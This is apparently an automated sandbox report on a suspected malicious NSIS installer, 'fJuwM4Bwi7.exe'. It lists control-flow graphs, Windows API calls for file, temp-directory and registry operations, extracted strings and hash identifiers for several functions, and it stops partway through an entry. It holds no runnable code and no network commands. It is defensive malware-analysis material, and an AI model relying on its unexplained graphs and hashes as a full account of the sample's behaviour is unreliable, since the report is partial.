                                        control_flow_graph 343 402c79-402cc7 GetTickCount GetModuleFileNameA call 4059c7 346 402cd3-402d01 call 405d36 call 40580d call 405d36 GetFileSize 343->346 347 402cc9-402cce 343->347 355 402df1-402dff call 402bda 346->355 356 402d07-402d1e 346->356 348 402f18-402f1c 347->348 362 402ed0-402ed5 355->362 363 402e05-402e08 355->363 358 402d20 356->358 359 402d22-402d2f call 4031b6 356->359 358->359 367 402d35-402d3b 359->367 368 402e8c-402e94 call 402bda 359->368 362->348 365 402e34-402e80 GlobalAlloc call 406141 call 4059f6 CreateFileA 363->365 366 402e0a-402e22 call 4031cc call 4031b6 363->366 392 402e82-402e87 365->392 393 402e96-402ec6 call 4031cc call 402f1f 365->393 366->362 395 402e28-402e2e 366->395 372 402dbb-402dbf 367->372 373 402d3d-402d55 call 405982 367->373 368->362 376 402dc1-402dc7 call 402bda 372->376 377 402dc8-402dce 372->377 373->377 388 402d57-402d5e 373->388 376->377 384 402dd0-402dde call 4060d3 377->384 385 402de1-402deb 377->385 384->385 385->355 385->356 388->377 394 402d60-402d67 388->394 392->348 403 402ecb-402ece 393->403 394->377 396 402d69-402d70 394->396 395->362 395->365 396->377 398 402d72-402d79 396->398 398->377 400 402d7b-402d9b 398->400 400->362 402 402da1-402da5 400->402 404 402da7-402dab 402->404 405 402dad-402db5 402->405 403->362 406 402ed7-402ee8 403->406 404->355 404->405 405->377 407 402db7-402db9 405->407 408 402ef0-402ef5 406->408 409 402eea 406->409 407->377 410 402ef6-402efc 408->410 409->408 410->410 411 402efe-402f16 call 405982 410->411 411->348
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402C8D
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fJuwM4Bwi7.exe,00000400), ref: 00402CA9
                                          • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 004059CB
                                          • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fJuwM4Bwi7.exe,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 00402CF2
                                        • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39
                                        Strings
                                        • "C:\Users\user\Desktop\fJuwM4Bwi7.exe", xrefs: 00402C79
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                        • Null, xrefs: 00402D72
                                        • soft, xrefs: 00402D69
                                        • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                        • Inst, xrefs: 00402D60
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                        • C:\Users\user\Desktop\fJuwM4Bwi7.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                        • Error launching installer, xrefs: 00402CC9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fJuwM4Bwi7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-528179520
                                        • Opcode ID: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                                        • Instruction ID: 2a27acbe37a486d3f9fadad6f2898e15cdcbef103c1943e89973ac3215dbffb0
                                        • Opcode Fuzzy Hash: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                                        • Instruction Fuzzy Hash: BC61C671A40205ABDF20AF64DE89B9A76B4EF00315F20413BF904B72D1D7BC9E418BAD
                                        Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 545 40173f-401762 call 4029fd call 405833 550 401764-40176a call 405d36 545->550 551 40176c-40177e call 405d36 call 4057c6 lstrcatA 545->551 557 401783-401789 call 405fa1 550->557 551->557 561 40178e-401792 557->561 562 401794-40179e call 40603a 561->562 563 4017c5-4017c8 561->563 571 4017b0-4017c2 562->571 572 4017a0-4017ae CompareFileTime 562->572 565 4017d0-4017ec call 4059c7 563->565 566 4017ca-4017cb call 4059a2 563->566 573 401864-40188d call 40501f call 402f1f 565->573 574 4017ee-4017f1 565->574 566->565 571->563 572->571 588 401895-4018a1 SetFileTime 573->588 589 40188f-401893 573->589 575 4017f3-401835 call 405d36 * 2 call 405d58 call 405d36 call 40554a 574->575 576 401846-401850 call 40501f 574->576 575->561 609 40183b-40183c 575->609 586 401859-40185f 576->586 590 40289b 586->590 592 4018a7-4018b2 CloseHandle 588->592 589->588 589->592 593 40289d-4028a1 590->593 595 402892-402895 592->595 596 4018b8-4018bb 592->596 595->590 598 4018d0-4018d3 call 405d58 596->598 599 4018bd-4018ce call 405d58 lstrcatA 596->599 604 4018d8-40222b call 40554a 598->604 599->604 604->593 609->586 611 40183e-40183f 609->611 611->576
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,00000000,00000000,00000031), ref: 0040177E
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,00000000,00000000,00000031), ref: 004017A8
                                          • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nszBD12.tmp$C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies$Call
                                        • API String ID: 1941528284-2973462801
                                        • Opcode ID: 3aa427727347f9e8141c62517debd6c6d5f1ffb41e66c3134885ff25fefb9c69
                                        • Instruction ID: 7da2985f373e49f587e0f88560f455237d5d3a700d2e38046b33ad83bb6d7614
                                        • Opcode Fuzzy Hash: 3aa427727347f9e8141c62517debd6c6d5f1ffb41e66c3134885ff25fefb9c69
                                        • Instruction Fuzzy Hash: 0341B871910515BACF10BFA5DC46DAF3679DF41369F20823BF511F10E1D63C8A419A6E
                                        Function 0040501F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 612 40501f-405034 613 4050ea-4050ee 612->613 614 40503a-40504c 612->614 615 405057-405063 lstrlenA 614->615 616 40504e-405052 call 405d58 614->616 618 405080-405084 615->618 619 405065-405075 lstrlenA 615->619 616->615 621 405093-405097 618->621 622 405086-40508d SetWindowTextA 618->622 619->613 620 405077-40507b lstrcatA 619->620 620->618 623 405099-4050db SendMessageA * 3 621->623 624 4050dd-4050df 621->624 622->621 623->624 624->613 625 4050e1-4050e4 624->625 625->613
                                        APIs
                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                        • lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll
                                        • API String ID: 2531174081-2590253870
                                        • Opcode ID: ee1b08cb592492bdf5f80b5dae1b552c690ecdeff46defc75ce9aeeb2979dc18
                                        • Instruction ID: 2b33129011dff48d1edd85efe61027b37dbb0349f6b457de8e93b882053e083c
                                        • Opcode Fuzzy Hash: ee1b08cb592492bdf5f80b5dae1b552c690ecdeff46defc75ce9aeeb2979dc18
                                        • Instruction Fuzzy Hash: C2219071900508BBDB119FA5CD84ADFBFB9EF14354F14807AF544B6290C2794E45DFA8
                                        Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 626 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 633 402892-4028a1 626->633 634 402368-402370 626->634 635 402380-402383 634->635 636 402372-40237f call 4029fd lstrlenA 634->636 640 402393-402396 635->640 641 402385-402392 call 4029e0 635->641 636->635 642 4023a7-4023bb RegSetValueExA 640->642 643 402398-4023a2 call 402f1f 640->643 641->640 647 4023c0-402496 RegCloseKey 642->647 648 4023bd 642->648 643->642 647->633 651 402663-40266a 647->651 648->647 651->633
                                        APIs
                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nszBD12.tmp
                                        • API String ID: 1356686001-1061038459
                                        • Opcode ID: 86a468557908f0d4cc1937d8ef59051a5efb18d14e0f25ee016bd79e191944f1
                                        • Instruction ID: 937c1904c824b73ffe337d2eacc138a1f8ac1658d2030852d1a46e58dbdf142b
                                        • Opcode Fuzzy Hash: 86a468557908f0d4cc1937d8ef59051a5efb18d14e0f25ee016bd79e191944f1
                                        • Instruction Fuzzy Hash: D71172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668
                                        Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 652 4015b3-4015c6 call 4029fd call 40585f 657 4015c8-4015e3 call 4057f1 CreateDirectoryA 652->657 658 40160a-40160d 652->658 666 401600-401608 657->666 667 4015e5-4015f0 GetLastError 657->667 659 401638-402181 call 401423 658->659 660 40160f-40162a call 401423 call 405d36 SetCurrentDirectoryA 658->660 673 402892-4028a1 659->673 660->673 675 401630-401633 660->675 666->657 666->658 670 4015f2-4015fb GetFileAttributesA 667->670 671 4015fd 667->671 670->666 670->671 671->666 675->673
                                        APIs
                                          • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040586D
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,00000000,00000000,000000F0), ref: 00401622
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies, xrefs: 00401617
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                        • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies
                                        • API String ID: 3751793516-1144022150
                                        • Opcode ID: db51a681e4e1b110c4379ef5fee21ee97cfdebff7cd263ace0e336009ceda904
                                        • Instruction ID: decf54c0780f34986dcb1f6dc2400c6331eb5c21fa926316ee50895bb5337331
                                        • Opcode Fuzzy Hash: db51a681e4e1b110c4379ef5fee21ee97cfdebff7cd263ace0e336009ceda904
                                        • Instruction Fuzzy Hash: CE11E931908150ABDB217F755D4496F67B4EA62365728473FF891B22D2C23C4D42E62E
                                        Function 004059F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 678 4059f6-405a00 679 405a01-405a2c GetTickCount GetTempFileNameA 678->679 680 405a3b-405a3d 679->680 681 405a2e-405a30 679->681 683 405a35-405a38 680->683 681->679 682 405a32 681->682 682->683
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405A0A
                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-2569497942
                                        • Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                        • Instruction ID: 2f7b9810ed7c5924072585cf2130ed1295747d9915b618abfa336aedeca5813d
                                        • Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                        • Instruction Fuzzy Hash: C1F0E2327482487BDB008F1ADC44B9B7B9CDF91710F00C03BF904AA280D2B0A8008B68
                                        Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 684 402a3d-402a66 RegOpenKeyExA 685 402ad1-402ad5 684->685 686 402a68-402a73 684->686 687 402a8e-402a9e RegEnumKeyA 686->687 688 402aa0-402ab2 RegCloseKey call 406061 687->688 689 402a75-402a78 687->689 696 402ab4-402ac3 688->696 697 402ad8-402ade 688->697 690 402ac5-402ac8 RegCloseKey 689->690 691 402a7a-402a8c call 402a3d 689->691 693 402ace-402ad0 690->693 691->687 691->688 693->685 696->685 697->693 699 402ae0-402aee RegDeleteKeyA 697->699 699->693 701 402af0 699->701 701->685
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                        • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 921281f3cc01420fdc1beeb1eeb708213ab33a1a3c9c72e215a90ba7be82d26f
                                        • Instruction ID: 1cfc72d501241f28ff1c9237e437913a5e8660848d06dce24e2e83bd327c9a1b
                                        • Opcode Fuzzy Hash: 921281f3cc01420fdc1beeb1eeb708213ab33a1a3c9c72e215a90ba7be82d26f
                                        • Instruction Fuzzy Hash: EA114F71A00108FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0DBB49E559F69
                                        Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 702 100016bd-100016f9 call 10001a5d 706 1000180a-1000180c 702->706 707 100016ff-10001703 702->707 708 10001705-1000170b call 100021b0 707->708 709 1000170c-10001719 call 100021fa 707->709 708->709 714 10001749-10001750 709->714 715 1000171b-10001720 709->715 716 10001770-10001774 714->716 717 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 714->717 718 10001722-10001723 715->718 719 1000173b-1000173e 715->719 724 100017b2-100017b8 call 100023da 716->724 725 10001776-100017b0 call 10001559 call 100023da 716->725 741 100017b9-100017bd 717->741 722 10001725-10001726 718->722 723 1000172b-1000172c call 100027ec 718->723 719->714 720 10001740-10001741 call 10002aa7 719->720 733 10001746 720->733 729 10001733-10001739 call 1000258d 722->729 730 10001728-10001729 722->730 736 10001731 723->736 724->741 725->741 740 10001748 729->740 730->714 730->723 733->740 736->733 740->714 745 100017fa-10001801 741->745 746 100017bf-100017cd call 100023a0 741->746 745->706 748 10001803-10001804 GlobalFree 745->748 752 100017e5-100017ec 746->752 753 100017cf-100017d2 746->753 748->706 752->745 755 100017ee-100017f9 call 100014e2 752->755 753->752 754 100017d4-100017dc 753->754 754->752 756 100017de-100017df FreeLibrary 754->756 755->745 756->752
                                        APIs
                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                        • GlobalFree.KERNEL32(00000000), ref: 10001768
                                        • FreeLibrary.KERNEL32(?), ref: 100017DF
                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                          • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                          • Part of subcall function 1000258D: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF
                                          • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                        • String ID:
                                        • API String ID: 1791698881-3916222277
                                        • Opcode ID: 5c34708dbc5c14fa42f4b7439be41c1509afaedaf37bf6653e8bb29f9fa28a01
                                        • Instruction ID: 946e86dc2be410c0748ecba0c1d48508df540d87c222276c6f0f58241c559a10
                                        • Opcode Fuzzy Hash: 5c34708dbc5c14fa42f4b7439be41c1509afaedaf37bf6653e8bb29f9fa28a01
                                        • Instruction Fuzzy Hash: C5318B79408205DAFB41DF649CC5BCA37ECFB042D5F018465FA0A9A09ADF78A8458A60
                                        Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
